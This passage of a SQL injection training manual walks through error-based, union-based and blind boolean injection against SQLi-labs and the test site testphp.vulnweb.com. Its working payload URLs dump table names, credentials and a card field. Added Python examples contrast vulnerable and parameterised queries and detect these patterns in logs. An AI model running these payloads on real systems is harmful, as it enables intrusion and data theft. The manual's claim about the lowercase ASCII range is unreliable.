Sqli Manual

This document discusses SQL injection techniques. It begins with an introduction to SQL injection, explaining that malicious users can inject SQL commands into web pages to bypass authentication, access sensitive data, or execute operating system commands. It then provides details on SQL functions, injection characters, and database fingerprinting. The remainder of the document demonstrates how to set up an SQL injection lab and provides step-by-step examples of exploiting SQL injection vulnerabilities to extract data from a database.

Uploaded by

Luis
TABLE OF CONTENTS

1 Abstract 3
2 SQL Injection 5
2.1 Basic SQL Functions 5
2.2 SQL Injection Characters 5
2.3 Database Fingerprinting 5
3 SQLi Lab Setup 7
4 SQL Basics 10
5 The SQLi Attack 12
5.1 Union Based SQL Injection 20
5.2 Length of database string 26
5.3 Table string length 31
5.4 User Name Enumeration 35
6 Manual SQL Injection Exploitation 39
7 Form Based SQL Injection Manually 51
8 Bypass SQL Injection Filter Manually 66
9 About Us 84

www.hackingarticles.in Page | 2
Abstract

SQL injection is a technique where a malicious user can inject SQL commands into an SQL statement
via a web page.
An attacker could bypass authentication, or access, modify and delete data within a database. In some
cases, SQL injection can even be used to execute commands on the operating system, potentially
allowing an attacker to escalate to more damaging attacks inside a network that sits behind a
firewall.

SQL Injection

Basic SQL Functions


SELECT    read data from the database based on search criteria
INSERT    insert new data into the database
UPDATE    update existing data based on given criteria
DELETE    delete existing data based on given criteria
ORDER BY  sort the result set in ascending or descending order
LIMIT     restrict how many records are retrieved from one or more tables

SQL Injection Characters


1  Character string indicators                 ' or "
2  Multi-line comment                          /* ... */
3  Addition, concatenate (or space in URL)     +
4  Single-line comment                         # or -- (hyphen hyphen)
5  Double pipe (concatenate)                   ||
6  Wildcard attribute indicator                %
7  Local variable                              @variable
8  Global variable                             @@variable
9  Time delay                                  waitfor delay '00:00:10'
10 String instead of a number or vice versa

Database Fingerprinting
We can find out the database by analysing the error message.
S.no  Error                                                                                   Type of Database
1     You have an error in your SQL syntax; check the manual that corresponds to your MySQL
      server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1                MySQL
2     ORA-00933: SQL command not properly ended                                               Oracle
3     Microsoft SQL Native Client error '80040e14' Unclosed quotation mark after the
      character string                                                                        MS SQL

SQLi Lab Setup
First, download the SQLi labs from https://github.com/Audi-1/sqli-labs and set them up in XAMPP.
Open the SQLI labs in the browser.

Click on "Setup/reset Database for labs".

SQL Basics
Consider a login page where you are asked to enter a username and password. When you submit them,
an SQL query is generated at the backend, executed, and the result is displayed to us on the home page
after login.
Username - Raj
Password - Chandel
So the backend query will look like
SELECT * FROM table_name WHERE username='Raj' AND password='Chandel';
It is entirely up to the developer how the parameter value is enclosed in the SQL query: in single
quotes, double quotes, quotes with brackets, etc.
So the query may look like

SELECT * FROM table_name WHERE username='Raj' AND password='Chandel';
SELECT * FROM table_name WHERE username=('Raj') AND password=('Chandel');
SELECT * FROM table_name WHERE username="Raj" AND password="Chandel";
SELECT * FROM table_name WHERE username=("Raj") AND password=("Chandel");

or any other form; it is entirely the developer's choice.

I'll explain further using the first query.
Q - What if I enter username = Raj'?
Ans - If I enter username=Raj', the backend query will look like
SELECT * FROM table_name WHERE username='Raj'' AND password='Chandel';
which is syntactically wrong because of the extra quote.
Q - How can we fix this broken query? Is it possible to do so?
Ans - Yes, it is possible to fix the above query even with username = Raj'. We can do so by commenting
out the rest of the query after Raj'. So our valid query will be
SELECT * FROM table_name WHERE username='Raj'
which is syntactically correct.
Q - How do we comment out the remaining query?
Ans - Well, it depends on the database at the backend. We generally use --+ (hyphen hyphen plus; the
+ is decoded to a space in the URL, and MySQL needs a space after --) or # (hash). So if I enter
username = Raj'--+, the complete query at the backend will look like
SELECT * FROM table_name WHERE username='Raj'--+' AND password='Chandel';
but the database will read and execute only
SELECT * FROM table_name WHERE username='Raj'
because everything after --+ is commented out and is not interpreted as part of the query.
This is what is called SQL INJECTION: changing the backend query using malicious input.
I don't know whether you have the same doubt that I had when I was learning all this, but mine was:
According to the above query formed by commenting, don't we need a valid password to log in?
Yes: if the developer has not taken measures to prevent SQL injection and has implemented the query as
shown above, it is possible to log in using only the username.
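As an added example (not from the original manual), the login query from this section built two ways, by string splicing as described above and by parameter binding, run against an in-memory SQLite table. The `users` table and the Raj/Chandel row are constructed for the demo; SQLite accepts the same `--` line comment as MySQL, so the comment-truncation behaves the same way (the `#` comment is MySQL-only).

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table holding the manual's example user."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('Raj', 'Chandel')")
    conn.commit()
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """The pattern the manual describes: input pasted straight into the SQL text."""
    return ("SELECT * FROM users WHERE username='" + username
            + "' AND password='" + password + "';")


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Runs the spliced query. Returns 'ok', 'denied', or 'syntax-error'
    (the latter is the error-based signal the manual talks about)."""
    try:
        row = conn.execute(build_vulnerable_query(username, password)).fetchone()
    except sqlite3.OperationalError:
        return "syntax-error"
    return "ok" if row is not None else "denied"


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Parameterised form: the values travel separately from the SQL text, so a
    quote or comment character inside them is just data, never syntax."""
    row = conn.execute(
        "SELECT * FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return "ok" if row is not None else "denied"


def demo() -> dict:
    conn = make_db()
    return {
        # correct credentials work either way
        "valid_vulnerable": login_vulnerable(conn, "Raj", "Chandel"),
        "valid_safe": login_safe(conn, "Raj", "Chandel"),
        # the stray quote from the Q&A above breaks the spliced query
        "stray_quote_vulnerable": login_vulnerable(conn, "Raj'", "Chandel"),
        # Raj'-- comments out the password check in the spliced query ...
        "comment_vulnerable": login_vulnerable(conn, "Raj'--", "wrong"),
        # ... but is just a username nobody has when bound as a parameter
        "comment_safe": login_safe(conn, "Raj'--", "wrong"),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:25s} {outcome}")
```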

The SQLi Attack

Click on Lesson 1 and add id as a parameter in the URL.

Keep increasing the id value (id=1, id=2 and so on); you will notice that you get an empty screen with
no username and password after id=14, which means the database has 14 records.

So the backend query must be something like this

SELECT * from table_name WHERE id='1';
Or
SELECT * from table_name WHERE id=('1');
Or
SELECT * from table_name WHERE id="1";

At this point, we don't know how the developer enclosed the value of the id parameter. Let's find out.
Break the query by fuzzing: enter id=1'

Boom!! We get an SQL syntax error. Since this error will help us in finding the backend query and we
will do SQL injection using this error, this type of SQL injection is called Error Based SQL Injection.

Now we have to analyse the error (see the screenshot).

You can also find this out using the escape character: in MySQL, \ (backslash) is used to escape a character.
Escaping a character means nullifying the special purpose of that character. You will get a clearer
picture from the screenshot using the escape character.

It is clear from the above screenshots that the backend queries are

Less-1 - SELECT * from table_name WHERE id='our input'
Less-2 - SELECT * from table_name WHERE id=our input
Less-3 - SELECT * from table_name WHERE id=('our input')
Less-4 - SELECT * from table_name WHERE id=("our input")

From now on I'll take Less-1 as the base lesson to explain further.

With our input as 1' the complete backend query will be
SELECT * from table_name WHERE id='1'' LIMIT 0,1
which is syntactically incorrect, and I explained above how to make it syntactically correct:
by giving the input 1'--+ (1 quote hyphen hyphen plus),
or by giving the input 1'--%20 (%20 is the URL encoding for space),
or by giving the input 1'%23 (%23 is the URL encoding for #).

http://localhost/sqli/Less-1/?id=1' --%20

http://localhost/sqli/Less-1/?id=1' %23

http://localhost/sqli/Less-1/?id=1' --+

Now we are able to break the query and are able to fix it syntactically.
What next?
Now we will try to add a query between the quote and --+ to get information from the database.

We'll use another SELECT query here to get information from the database.
Q - Will two SELECT queries work together?
Ans - No, we have to use the UNION operator to make it work.
The UNION operator is used to combine the result sets of two or more SELECT statements.
But the UNION operator has one precondition: the number of columns on both sides of the UNION
operator must be the same.
Since we don't know the number of columns in the SELECT query at the backend, first we have to
find the number of columns used in the SELECT query.
For this, we will use the ORDER BY clause.
The ORDER BY clause arranges the result set in ascending or descending order of the columns used in
the query.
ORDER BY country -> will arrange the result set in ascending order of the elements of the column (country)
Now the problem is that we don't even know the names of the columns...
The solution to this problem is in the ORDER BY clause itself...
We'll use ORDER BY 1, ORDER BY 2 etc., because ORDER BY 1 will arrange the result set in ascending
order of the column present in first place in the query. (Please note, ORDER BY 1 will not arrange the
result set according to the first column of the table; it will arrange the result set in ascending order of
the column present in first place in the query.)

Let’s try now

http://localhost/sqli/Less-1/?id=1' order by 1 --+    No Error

http://localhost/sqli/Less-1/?id=1' order by 2 --+    No Error

http://localhost/sqli/Less-1/?id=1' order by 4 --+    Error

This shows that there is no 4th column in the query. So now we know there are 3 columns in the query
at the backend.

So now we can use the UNION operator with another SELECT query.

http://localhost/sqli/Less-1/?id=1' union select 1,2,3 --+

See, there is no error, but we are getting the result set of the first query. To get the result of the second SELECT
query on the screen, we have to make the result set of the first query EMPTY. This we can achieve
by providing an id that does not exist. We can provide a negative id or an id > 14, because at the start of
the article we figured out that there are 14 ids in the database.

http://localhost/sqli/Less-1/?id=-1' union select 1,2,3 --+
Or
http://localhost/sqli/Less-1/?id=15' union select 1,2,3 --+

This shows that we are getting the values of column 2 and column 3 as output. So we'll use these two columns
to extract information about the database and from the database.

http://localhost/sqli/Less-1/?id=-1' union select 1,2,version() --+

This will give the version of the database used at the backend.

http://localhost/sqli/Less-1/?id=-1' union select 1,database(),version() --+

This will give the database we are using and the current version of the database used at the backend.

Since we are using the UNION operator to perform SQL injection, this type of injection is called UNION
BASED SQL INJECTION (a type of ERROR BASED SQL INJECTION).
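As an added example, not part of the original manual: the Less-1 style lookup reproduced against an in-memory SQLite table with three columns and 14 constructed rows, to show the two facts the ORDER BY and UNION steps above rely on (ORDER BY n fails once n exceeds the column count, and a UNION only runs when both SELECTs return the same number of columns), next to a hardened lookup that parses the id as an integer and binds it as a parameter. The `users` table and its column names are assumptions for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample table: three columns and 14 rows, like the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(i, f"user{i}", f"pass{i}") for i in range(1, 15)])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str):
    """Splices the raw id into the SQL text, as the Less-1 code does.
    Returns (first_row_or_None, error_message_or_None); the error text is
    the signal the error-based approach in the manual keys on."""
    sql = f"SELECT * FROM users WHERE id='{raw_id}' LIMIT 0,1"
    try:
        return conn.execute(sql).fetchone(), None
    except sqlite3.OperationalError as exc:
        return None, str(exc)


def lookup_safe(conn: sqlite3.Connection, raw_id: str):
    """Hardened lookup: the id must parse as an integer (ValueError otherwise)
    and is bound as a parameter, so no input can alter the query structure."""
    id_value = int(raw_id)
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1",
                        (id_value,)).fetchone()


def order_by_accepted(conn: sqlite3.Connection, n: int) -> bool:
    """True when 'ORDER BY n' runs, i.e. the backend SELECT has at least n
    columns. SQLite raises 'ORDER BY term out of range' otherwise, where
    MySQL reports 'Unknown column' in the order clause."""
    _row, err = lookup_vulnerable(conn, f"1' ORDER BY {n} --")
    return err is None


def demo() -> dict:
    conn = make_db()
    return {
        "order_by_3": order_by_accepted(conn, 3),
        "order_by_4": order_by_accepted(conn, 4),
        # UNION with the wrong column count is rejected outright
        "union_two_cols": lookup_vulnerable(conn, "-1' UNION SELECT 1,2 --"),
        # matching count plus a non-existent id: the injected row is what is shown
        "union_three_cols": lookup_vulnerable(conn, "-1' UNION SELECT 1,2,3 --"),
        "safe_normal": lookup_safe(conn, "5"),
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:18s} {outcome}")
    try:
        lookup_safe(make_db(), "-1' UNION SELECT 1,2,3 --")
    except ValueError as exc:
        print("safe lookup rejected the payload:", exc)
```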

Union Based SQL Injection


Variable/function Output
user() Current User
database() Current Database
version() Database Version
schema() Current Database
UUID() System UUID Key
current_user() Current User
system_user() Current System User
session_user() Session User
@@hostname Current Hostname
@@tmpdir Temporary Directory
@@datadir Data Directory
@@version Version of Database
@@basedir Base Directory
@@GLOBAL.have_symlink Check whether symlink support is enabled or disabled
@@GLOBAL.have_ssl Check whether SSL is available

In order for union injections to work, we should first know the names of the tables in the database. For
this, type:
id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() --+

As you can see, the above query shows us the name of one of the tables in the database. For
instance: emails
Now, sometimes the programmer may not print all the rows, so we will have to check the rows of the
database one by one using the LIMIT keyword. Therefore, type:
id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1 --+

As you can see, the second table in the database is referers.
Similarly, let's check the next table name.
id=-1' union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1 --+

This was one method to check table names one by one; another method is getting all the table names
at once by using the group_concat keyword. This keyword presents all the table names as a group.
For this, type:

id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

And as a result, which you can observe in the above image, all the table names will be shown together.
Now let's check one of the tables presented to us. To extract information from a table, type:

id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

As you can see, the above statement shows all the columns together due to the use of the
group_concat keyword. Also, we are using the word 'column' instead of 'table' because we want to
know the columns of a table now.

Till now we have extracted the names of the database and its tables. Now let's see the content of a
table. For this, type:

id=-1' union select 1,group_concat(username),3 from users --+

The above statement will show us all the usernames from the table users. Now let's check the
passwords for these usernames. Type:

id=-1' union select 1,group_concat(password),3 from users --+

And like this, you will have the passwords for your usernames. There is another method to see usernames
and passwords together, with the following statement:

id=-1' union select 1,group_concat(username),group_concat(password) from users --+

Blind Boolean Based Injection
First we need to open http://localhost:81/sqli/Less-8/?id=1 in the browser; this will send the following query
to the database.

SELECT * from table_name WHERE id=1

As output, it will display "you are in" in yellow text on the web page, as shown in the given
image.

When an attacker tries to break this query using a single quote (') http://localhost:81/sqli/Less-8/?id=1'
or a different technique, he will not be able to find an error message. Moreover, the yellow
text will disappear if the attacker tries to inject an invalid query, which is also shown in the given image.

Then the attacker will go for blind SQL injection, to make sure that the injected query returns an answer of
either true or false.

http://localhost:81/sqli/Less-8/?id=1' AND 1=1 --+

SELECT * from table_name WHERE id=1' AND 1=1

Now the database tests the given condition, whether 1 is equal to 1. If the query is valid it
returns TRUE; from the screenshot you can see we have got the yellow text "you
are in" again, which means our query is valid.

The next query checks the URL

http://localhost:81/sqli/Less-8/?id=1' AND 1=0 --+
SELECT * from table_name WHERE id=1' AND 1=0

Now it will test the given condition, whether 1 is equal to 0. As we know, 1 is not equal to 0, hence the
database answers FALSE for this query. The screenshot confirms it: the yellow text
disappears again.
Hence it is confirmed that the web application is vulnerable to blind SQL injection. Using true and false
conditions we are going to retrieve database information.

Length of database string
The following query will ask for the length of the database name string. For example, if the name of the database
is IGNITE, which contains 6 letters, then the string length for the database IGNITE is equal to 6.
Similarly, we will inject the query given below, which asks whether the length of the database string is equal
to 1; in response to that query it will answer TRUE or FALSE through the text "you are in".

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 1 --+

From the given screenshot you can see that the text disappears again, which means it has returned FALSE:
the length of the database string is not equal to 1.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 2 --+

Again it tests whether the length of the database string is equal to 2; it returns FALSE, meaning the
length of the database string is not equal to 2. Repeat the same step until we receive TRUE, for string
length 3/4/5 and so on.

http://localhost:81/sqli/Less-8/?id=1' AND (length(database())) = 8 --+

When I test whether the string length is equal to 8, it answers TRUE and as a result the yellow text "you are in"
appears again.

As we know, the computer does not understand human language; it can only read binary,
therefore we will use ASCII codes. The ASCII code associates an integer value with every symbol
in the character set, such as letters, digits, punctuation marks, special characters, and control
characters.
For example, look at the ASCII codes of the following string:
1 = I = 73
2 = G = 71
3 = N = 78
4 = I = 73
5 = T = 84
6 = E = 69

Further, we will enumerate the database name using the ASCII code of each of its 8 characters.
The next query asks the database to test the condition whether the first character of the database name
is greater than 100, using ascii() and substr().
http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 100 --+

It returns TRUE; if you match this against the ASCII table you will observe that the lowercase
letters run from 100 till 172.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) > 120 --+

Similarly, it will test again whether the first letter is greater than 120. But this time it returns FALSE,
which means the first letter is greater than 100 and less than 120.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 101 --+

Next it equates the first character with 101; again we get FALSE.

We performed this test from 101 till 114 but received FALSE every time.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 114 --+

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),1,1))) = 115 --+

Finally we receive a TRUE reply at 115, which means the first character is equal to 115, where 115 = 's'.

Similarly, test for the second character: repeat the above step, replacing the first position with the second.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select database()),2,1))) > 100 --+

I received a TRUE reply at 101, which means the second character is equal to 101, and 101 = 'e'.
Similarly, I performed this for all eight characters and got the following result:
1 = s = 115
2 = e = 101
3 = c = 99
4 = u = 117
5 = r = 114
6 = i = 105
7 = t = 116
8 = y = 121

Table string length
We have to use the same technique for enumerating information about the tables inside the
database. The given query tests the condition whether the length of the first table's name is greater
than 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 5 --+

In reply we receive TRUE and the text "you are in" appears again on the web site.

The given query tests the condition whether the length of the first table's name is greater than 6 or
not.
http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) > 6 --+

In reply we receive FALSE and the text "you are in" disappears again from the web site.

The given query tests the condition whether the length of the first table's name is equal to 6 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 --+

In reply we receive TRUE and the text "you are in" appears again on the web site.
Similarly, I tested the second and third tables using the same technique, changing only the table number
(the LIMIT offset) in the same query.

Similarly, enumerate the fourth table's information using the following query, which tests the condition
whether the length of the fourth table's name is equal to 5 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 --+

In reply we receive TRUE and the text "you are in" appears again on the web site.
As we did in the database enumeration using ASCII codes, we are going to use the same
technique to retrieve the table name.

Further, we will enumerate the 4th table's name using the ASCII code of each of its 5 characters.
The next query asks the database to test the condition whether the first character of the table name is
greater than 115, using ascii() and substr().

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))) > 115 --+

It returns TRUE: the text "you are in" appears again on the web site.

The next query asks the database to test the condition whether the first character of the table name is
greater than 120, using ascii() and substr().

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))) > 120 --+

But this time it returns FALSE, which means the first letter is greater than 115 and less than 120.

Proceeding to equate the character with the ASCII codes between 115 and 120, one at a time. The next query
asks the database to test the condition whether the first character of the table name is equal to 116.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))) = 116 --+

It returns FALSE; the text disappears.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1),1,1))) = 117 --+

Similarly we tested the remaining characters and received the following result:

1 = u = 117
2 = s = 115
3 = e = 101
4 = r = 114
5 = s = 115

User Name Enumeration
Using the same method we are going to enumerate the length of the username string from inside the table
users.
The query given below tests whether the string length is equal to 4 or not.

http://localhost:81/sqli/Less-8/?id=1' AND (length((select username from users limit 0,1))) = 4 --+

It replies TRUE with the help of the yellow text.

Using the same method we are going to enumerate the username from inside the table users.
The query given below tests the first character using its ASCII code.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1),1,1))) > 100 --+

We received FALSE, which means the first character must be less than 100.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1),1,1))) > 50 --+

We received TRUE, which means the first character must be more than 50.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1),1,1))) > 60 --+

We received TRUE, which means the first character must be more than 60.

Similarly,

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1),1,1))) > 70 --+

We received FALSE, which means the first character is less than 70.
Hence the first character must lie between 60 and 70 in ASCII code.

Proceeding to compare the character with the different ASCII codes using the following query.

http://localhost:81/sqli/Less-8/?id=1' AND (ascii(substr((select username from users limit 0,1),1,1))) = 68 --+

This time we successfully receive TRUE, with the text "you are in" appearing.
Similarly, I tested all four characters in order to retrieve the username:
1 = D = 68
2 = u = 117
3 = m = 109
4 = b = 98
Hence today we learned how an attacker extracts data from a database using blind SQL injection.
!!Try yourself to retrieve the password for user dumb!!
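From the defender's side, as an added example not taken from the manual: a small detector that URL-decodes the query string of web-server access-log lines and counts the request patterns shown in the UNION-based and blind boolean-based sections above (ORDER BY n, UNION SELECT, information_schema reads, ascii(substr(...)) and length(...) tests, and the --+ / %23 comment terminators), then gives each client a verdict. The log lines are constructed for the demo, and the signature names and thresholds are assumptions.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache combined format), modelled on the
# request sequences this manual walks through; not captured from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqli/Less-1/?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /sqli/Less-1/?id=1' HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /sqli/Less-1/?id=1'%20order%20by%204%20--+ HTTP/1.1" 200 640 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /sqli/Less-1/?id=-1'%20union%20select%201,database(),version()%20--+ HTTP/1.1" 200 700 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sqli/Less-1/?id=-1'%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20%23 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:01:00 +0000] "GET /sqli/Less-8/?id=1'%20AND%20(ascii(substr((select%20database()),1,1)))%20%3E%20100%20--+ HTTP/1.1" 200 300 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:01:01 +0000] "GET /sqli/Less-8/?id=1'%20AND%20(ascii(substr((select%20database()),1,1)))%20%3E%20120%20--+ HTTP/1.1" 200 290 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /sqli/Less-8/?id=1'%20AND%20(ascii(substr((select%20database()),1,1)))%20=%20115%20--+ HTTP/1.1" 200 300 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:02:00 +0000] "GET /sqli/Less-1/?id=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Each signature is checked against the URL-decoded, lower-cased query string,
# i.e. the form the database actually saw rather than the raw URL.
SIGNATURES = [
    ("quote_break", re.compile(r"'\s*($|--|#)")),
    ("comment_terminator", re.compile(r"--(\s|$)|#")),
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+")),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema_read", re.compile(r"\binformation_schema\.")),
    ("boolean_probe", re.compile(r"\b(ascii|length)\s*\(\s*\(?\s*(substr|select|database)")),
    ("db_fingerprint", re.compile(r"\b(version|database|current_user|system_user|user)\s*\(\s*\)|@@\w+")),
]


def parse_line(line: str):
    """Returns (client_ip, decoded_query, status) or None for a non-matching line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    query = target.split("?", 1)[1] if "?" in target else ""
    # unquote_plus turns %20 and '+' into spaces and %23 into '#'
    return ip, unquote_plus(query).lower(), int(status)


def match_signatures(decoded_query: str) -> list:
    return [name for name, rx in SIGNATURES if rx.search(decoded_query)]


def analyze(log_text: str) -> dict:
    """Counts signature hits per client; clients with no hits are left out."""
    per_client = defaultdict(Counter)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, query, _status = parsed
        for name in match_signatures(query):
            per_client[ip][name] += 1
    return dict(per_client)


def flag_clients(per_client: dict, probe_threshold: int = 3) -> list:
    """Turns per-client counts into a verdict. Repeated ascii()/length() tests
    are the blind boolean pattern; UNION or information_schema reads are
    extraction; ORDER BY n alone is the column counting that precedes it."""
    verdicts = []
    for ip, counts in per_client.items():
        if counts["boolean_probe"] >= probe_threshold:
            verdicts.append((ip, "blind boolean-based enumeration"))
        elif counts["union_select"] or counts["schema_read"]:
            verdicts.append((ip, "union-based extraction"))
        elif counts["order_by_probe"]:
            verdicts.append((ip, "column-count probing"))
        elif counts["quote_break"]:
            verdicts.append((ip, "quote injection test"))
    return verdicts


if __name__ == "__main__":
    summary = analyze(SAMPLE_LOG)
    for ip, verdict in flag_clients(summary):
        print(ip, verdict, dict(summary[ip]))
```

A client doing a few ORDER BY or quote probes and then stopping may be a scanner rather than a manual attacker, so the per-client counts are worth keeping alongside the verdict when triaging.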

Manual SQL Injection Exploitation
We are again performing SQL injection manually, on the live test website "vulnweb.com".

Open the targeted URL given below in the browser:

http://testphp.vulnweb.com/artists.php?artist=1

So here we are going to test SQL injection for "artist=1".

Now use the error-based technique by adding an apostrophe (') at the end of the input, which will try to
break the query.

testphp.vulnweb.com/artists.php?artist=1'

In the given screenshot you can see we have got an error message, which means the running site is
vulnerable to SQL injection.

Now use the ORDER BY keyword, which sorts the records in ascending or descending order, for artist=1

http://testphp.vulnweb.com/artists.php?artist=1 order by 1

Similarly, repeat for order by 2, 3 and so on, one by one

http://testphp.vulnweb.com/artists.php?artist=1 order by 2

http://testphp.vulnweb.com/artists.php?artist=1 order by 4

From the screenshot, you can see we have got an error at order by 4, which means the query consists of only
three columns.

Let's penetrate further using union-based injection to select data from a different table.

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3

From the screenshot, you can see it shows the result for only one table, not for the others.

Now try to pass wrong input into the database through the URL by replacing artist=1 with artist=-1 as
given below:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

Hence you can see it is now showing the result for the remaining two tables also.

Use the next query to fetch the name of the database

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3
From the screenshot, you can read the database name acuart

The next query will extract the current username as well as the version of the database system

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()
Here we have retrieved 5.1.73-0ubuntu0.10.04.1 as the version and acuart@localhost as the current user

Through the next query, we will try to fetch the table names inside the database

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1

From the screenshot you can read that the name of the first table is artists.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1

From the screenshot you can read that the name of the second table is carts.

Similarly, repeat the same query for another table with a slight change

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 3: categ

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

We got table 4: featured

Similarly, repeat the same query for tables 4, 5, 6 and 7, making slight changes in LIMIT.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7: users

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1

Since we didn't get anything when the limit is set to 8,1, there might be only 8 tables inside the
database.

The group_concat function is used to concatenate two or more strings into a single string.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

From the screen you can see that through the group_concat function we have successfully retrieved all the table
names inside the database.
Table 1: artist
Table 2: Carts
Table 3: Categ
Table 4: Featured
Table 5: Guestbook
Table 6: Pictures
Table 7: Product
Table 8: users

Maybe we can get some important data from the users table, so let's penetrate further. Again,
use the group_concat function on the table users to retrieve all of its column names.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'

Awesome!! We successfully retrieved all eight column names from inside the table users.
Then I chose only four columns, i.e. uname, pass, email and cc, for further enumeration.

Use the group_concat function to select uname from the table users by executing the following query
through the URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users

From the screenshot, you can read uname: test

Use the group_concat function to select pass from the table users by executing the following query through
the URL
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users

From the screenshot, you can read pass: test

Use the group_concat function to select cc (credit card) from the table users by executing the following query
through the URL

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(cc),3 from users

From the screenshot, you can read cc: 1234-5678-2300-9000

Use the group_concat function to select email from the table users by executing the following query through
the URL
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(email),3 from users
From the screenshot, you can read email: [email protected]
Enjoy hacking!!

Form Based SQL Injection Manually
This lab is a POST, error-based, single-quote (') string injection. When you open it in the browser you will
observe that it contains text fields for username and password to log in to the web server. As we are
